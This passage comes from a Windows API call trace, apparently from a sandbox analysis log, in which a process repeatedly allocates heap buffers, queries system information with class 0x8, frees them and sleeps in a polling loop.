SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0297.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0297.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0297.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0297.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0297.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.692] Sleep (dwMilliseconds=0x110) [0297.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0297.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0297.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0297.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0297.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0297.710] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0297.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0297.710] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.711] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0297.711] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.711] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.711] Sleep (dwMilliseconds=0x110) [0297.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0297.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0297.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0297.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0297.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0297.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0297.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0297.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0297.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.719] Sleep (dwMilliseconds=0x110) [0297.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0297.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0297.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0297.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0297.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0297.740] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0297.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0297.740] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0297.741] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.741] Sleep (dwMilliseconds=0x110) [0297.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0297.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0297.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0297.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0297.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0297.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0297.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0297.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0297.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.754] Sleep (dwMilliseconds=0x110) [0297.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0297.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0297.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0297.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0297.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0297.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0297.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0297.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0297.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.768] Sleep (dwMilliseconds=0x110) [0297.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0297.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0297.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0297.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0297.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0297.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0297.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0297.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0297.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.786] Sleep (dwMilliseconds=0x110) [0297.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0297.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0297.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0297.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0297.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0297.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0297.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0297.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0297.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.802] Sleep (dwMilliseconds=0x110) [0297.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0297.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0297.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0297.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0297.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0297.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0297.816] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0297.816] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0297.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.817] Sleep (dwMilliseconds=0x110) [0297.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0297.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0297.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0297.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0297.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0297.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0297.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0297.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0297.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.832] Sleep (dwMilliseconds=0x110) [0297.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0297.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0297.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0297.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0297.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0297.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0297.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0297.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0297.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.849] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.849] Sleep (dwMilliseconds=0x110) [0297.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0297.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0297.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0297.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0297.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0297.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0297.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0297.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0297.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.863] Sleep (dwMilliseconds=0x110) [0297.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0297.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0297.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0297.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0297.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0297.990] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0297.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0297.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0297.990] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0297.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0297.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0297.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0297.991] Sleep (dwMilliseconds=0x110) [0298.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0298.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0298.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0298.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0298.007] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0298.007] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0298.008] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0298.008] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0298.008] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.009] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.009] Sleep (dwMilliseconds=0x110) [0298.012] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0298.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0298.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0298.013] 